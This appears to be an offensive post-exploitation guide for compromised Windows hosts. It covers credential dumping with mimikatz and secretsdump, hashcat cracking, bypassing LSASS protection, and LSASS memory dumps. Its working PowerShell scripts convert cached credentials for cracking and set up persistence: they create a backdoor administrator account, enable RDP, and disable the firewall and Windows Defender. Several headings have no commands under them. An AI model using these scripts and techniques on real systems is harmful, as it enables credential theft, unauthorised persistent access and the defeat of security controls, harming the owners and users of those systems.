💀Elevated Post Exploitation
This guide will help you establish better persistence on compromised systems. It is written linearly: from top to bottom these are good practices to apply in order. Every module here assumes you have ALREADY ACHIEVED ADMINISTRATOR ACCESS.
Dumping Hashes
Once we have Administrator access on a Windows host we can dump credential hashes to open up the rest of the network to further attacks (pass-the-hash, cracking, credential reuse).
Resources: https://www.ired.team/offensive-security/credential-access-and-credential-dumping
Method 1: Mimikatz
Run the following commands to dump hashes.
Method 2: SecretsDump.py
Valid Administrator Credentials
With valid administrator credentials we can dump the hashes remotely with a single secretsdump.py command:
SAM / SYSTEM / SECURITY Hives
We can also dump the hashes offline from the registry hives. This only requires transferring the SYSTEM, SAM and SECURITY hive files to our own machine, using whatever file transfer method is most convenient. Include SECURITY: it holds the cached domain credentials and LSA secrets, not just the local SAM accounts.
Method 3: Meterpreter
Use the following modules
Cracking NTLM (NT) Hashes
hashcat mode 1000 is the NT hash, i.e. the nt field of secretsdump's user:rid:lm:nt::: output. Despite the common naming, this is not NTLMv1: NetNTLMv1 and NetNTLMv2 challenge-responses captured on the wire are separate formats (modes 5500 and 5600).
hashcat -m 1000 <hash> rockyou.txt
Cracking Cached Domain Credentials
To crack cached domain credentials with hashcat they must first be put into the following format:
Meterpreter's cachedump module output cannot be fed to hashcat directly, but converting it is easy.
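The conversion described above, as an added example (not code from the original page). hashcat mode 2100 (DCC2, Vista and later) expects lines of the form `$DCC2$10240#username#hash`, and mode 1100 (DCC1, XP/2003) expects `hash:username`. The input layout is an assumption: one entry per line, username first, the 32-hex-digit cache hash following a `#` (DCC2/M$ tag) or a `:`; the regex keys on the hash so minor layout differences between Meterpreter versions still parse. The sample lines are constructed, not from a real host.

```powershell
# Added example: convert Meterpreter cachedump lines into hashcat-ready lines.
function Convert-CachedumpToHashcat {
    param(
        [Parameter(Mandatory)][string[]]$Lines,
        # PBKDF2 iteration count for DCC2. 10240 is the Windows default; if the target
        # changed it, pass the real value or hashcat will never find the password.
        [int]$Iterations = 10240
    )
    foreach ($line in $Lines) {
        # user:$DCC2$user#hash:DOM:dns  (Vista+ -> DCC2)   user:M$user#hash:DOM:dns  (XP/2003 -> DCC1)
        if ($line -match '^(?<user>[^:]+):(?<tag>\$DCC2\$|M\$)[^#]*#(?<hash>[0-9a-fA-F]{32})') {
            # DCC2 salts PBKDF2 with the lowercased username, so normalise it.
            $user = $Matches.user.ToLower(); $hash = $Matches.hash.ToLower()
            if ($Matches.tag -eq '$DCC2$') {
                [pscustomobject]@{ Mode = 2100; Line = "`$DCC2`$$Iterations#$user#$hash" }
            } else {
                [pscustomobject]@{ Mode = 1100; Line = "${hash}:$user" }
            }
        }
        # user:hash:DOM:dns with no tag at all: assume a modern (DCC2) host (assumption)
        elseif ($line -match '^(?<user>[^:]+):(?<hash>[0-9a-fA-F]{32})(:|$)') {
            $user = $Matches.user.ToLower(); $hash = $Matches.hash.ToLower()
            [pscustomobject]@{ Mode = 2100; Line = "`$DCC2`$$Iterations#$user#$hash" }
        }
        else {
            Write-Warning "skipped unparsed line: $line"
        }
    }
}

# Constructed sample output in the assumed cachedump shape (placeholder hashes, not real data)
$sample = @(
    'administrator:$DCC2$administrator#0123456789abcdef0123456789abcdef:CORP:corp.local',
    'jdoe:M$jdoe#fedcba9876543210fedcba9876543210:CORP:corp.local',
    'garbage line that should be skipped'
)
$converted = Convert-CachedumpToHashcat -Lines $sample
$converted | Where-Object Mode -eq 2100 | Select-Object -ExpandProperty Line | Set-Content dcc2.txt
$converted | Where-Object Mode -eq 1100 | Select-Object -ExpandProperty Line | Set-Content dcc1.txt
# then, on the cracking box:  hashcat -m 2100 dcc2.txt rockyou.txt   /   hashcat -m 1100 dcc1.txt rockyou.txt
```

DCC2 is deliberately slow (10240 PBKDF2 rounds), so expect far lower rates than for NT hashes; a targeted wordlist with rules beats a large dictionary here.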
Bypassing LSASS Protections
Description
Windows 8.1 and later can run LSASS as a Protected Process Light (PPL), enabled through the RunAsPPL value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. This is not an integrity level: when a process tries to open a handle to LSASS, the kernel checks the caller's own protection level and signature, and refuses memory-read access to any unprotected process, even one running as SYSTEM with SeDebugPrivilege. That is why mimikatz and other user-mode dumpers fail against a protected LSASS regardless of how elevated we are.
Error
Bypassing PPL
Since PPL is enforced by the kernel, we can only bypass it from kernel mode. mimikatz does this by loading its own signed driver and clearing the protection flag on the LSASS process object, after which normal user-mode dumping works again. Loading a driver requires SeLoadDriverPrivilege, which members of Administrators hold (it must be enabled in the token first). Caveat: on current Windows builds the driver may be refused by HVCI or the vulnerable-driver blocklist, and driver loads are a loud event for any EDR.
Bypass
Offline Memory Dumps
There will be times when mimikatz gets picked up. Try disabling Windows Defender first, but if an antivirus or EDR keeps blocking it we can extract the hashes offline. The idea is the same as with the hives above: take a memory dump of the lsass process and transfer the DMP file to our attacking Windows machine, where mimikatz can parse it without ever touching the target's LSASS.
Transfer the DMP file to our attacking Windows machine.
Do the same for other processes you have access to; their memory can reveal what security software is enforcing, which hints at what to disable next.
Persistence
Adding Administrator Users
Then we can use psexec to log in with the new account.
Disable Firewall
Enable RDP
Disabling Windows Defender
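The four persistence steps above (add an admin user for psexec, enable RDP, disable the firewall, disable Defender) as one added example, not the page's original commands. It assumes an elevated PowerShell 5.1 or later on the target; the username and password are placeholders to change, and every step is verified at the end so you know what actually took effect.

```powershell
# Added example: local persistence steps with verification. Run elevated on the target.
param(
    [string]$Username = 'svc_update',                     # placeholder
    [string]$Password = 'Use-A-Long-Random-Value-Here!1'  # placeholder
)
$ErrorActionPreference = 'Stop'
$secure = ConvertTo-SecureString $Password -AsPlainText -Force

# --- Adding Administrator Users ---
if (-not (Get-LocalUser -Name $Username -ErrorAction SilentlyContinue)) {
    New-LocalUser -Name $Username -Password $secure -PasswordNeverExpires -AccountNeverExpires | Out-Null
} else {
    Set-LocalUser -Name $Username -Password $secure
}
if (-not (Get-LocalGroupMember -Group 'Administrators' -Member $Username -ErrorAction SilentlyContinue)) {
    Add-LocalGroupMember -Group 'Administrators' -Member $Username
}
# psexec/WMI with a local admin other than the built-in RID-500 account gets a filtered,
# non-admin token over the network unless UAC remote restrictions are switched off:
New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' `
    -Name LocalAccountTokenFilterPolicy -Value 1 -PropertyType DWord -Force | Out-Null

# --- Enable RDP ---
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0
Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'   # opens 3389 without dropping the whole firewall
# Members of Administrators can RDP in without being added to 'Remote Desktop Users'.

# --- Disable Firewall ---
# Only needed if the single RDP rule above is not enough; turning every profile off is very visible.
Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled False

# --- Disabling Windows Defender ---
# Ignored or rejected when Tamper Protection is on (the default on current Windows 10/11 builds);
# the verification below reports IsTamperProtected so you are not relying on a change that never happened.
try {
    Set-MpPreference -DisableRealtimeMonitoring $true
    Add-MpPreference -ExclusionPath 'C:\Windows\Temp'   # narrower fallback: exclude the tool directory
} catch {
    Write-Warning "Defender configuration refused: $_"
}

# --- Verify what actually took effect ---
$status = Get-MpComputerStatus
[pscustomobject]@{
    UserIsAdmin     = [bool](Get-LocalGroupMember -Group 'Administrators' -Member $Username -ErrorAction SilentlyContinue)
    RdpAllowed      = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server').fDenyTSConnections -eq 0
    FirewallOff     = -not (Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'True' })
    RealtimeAvOff   = -not $status.RealTimeProtectionEnabled
    TamperProtected = $status.IsTamperProtected
}
```

Every one of these changes writes an event (4720/4732 for the account and group change, 4946/4950 for firewall rule changes, and Defender's own operational log), so on a monitored host do only the steps you need and prefer the RDP rule over disabling the firewall outright.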